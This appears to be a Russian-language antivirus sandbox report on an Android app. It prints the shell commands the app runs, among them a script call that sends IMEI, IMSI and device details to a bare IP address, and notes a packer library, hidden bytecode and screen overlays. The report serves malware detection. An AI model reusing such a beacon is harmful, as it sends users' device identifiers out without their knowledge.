Запускает следующие shell-скрипты:
- <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>fe972356a9e0kkapp&version=2.3.20140709&imsi=<IMSI>&channel=wangdoujia&model=<System Property>&free_mem=830791680&total_mem=1055907840&language=en_US 0
- <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>fe972356a9e0kkapp&version=2.3.20140709&imsi=<IMSI>&channel=wangdoujia&model=<System Property>&free_mem=836825088&total_mem=1055907840&language=en_US 0
- chmod 755 <Package Folder>/.jiagu/libjiagu.so
- chmod 775 <Package Folder>/app_lib/unobs
- sh <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>fe972356a9e0kkapp&version=2.3.20140709&imsi=<IMSI>&channel=wangdoujia&model=<System Property>&free_mem=830791680&total_mem=1055907840&language=en_US 0
- sh <Package Folder>/app_lib/unobs <Package> http://112.124.45.224/uninstall/?site=malbum&device_id=<IMEI>fe972356a9e0kkapp&version=2.3.20140709&imsi=<IMSI>&channel=wangdoujia&model=<System Property>&free_mem=836825088&total_mem=1055907840&language=en_US 0
Загружает динамические библиотеки:
- ffmpeg_jni
- ku3d
- libjiagu
- tiffdecoder
Использует следующие алгоритмы для шифрования данных:
Использует следующие алгоритмы для расшифровки данных:
Использует специальную библиотеку для скрытия исполняемого байткода.
Осуществляет доступ к информации о сети.
Осуществляет доступ к информации о телефоне (номер, imei и тд.).
Осуществляет доступ к информации о запущенных приложениях.
Отрисовывает собственные окна поверх других приложений.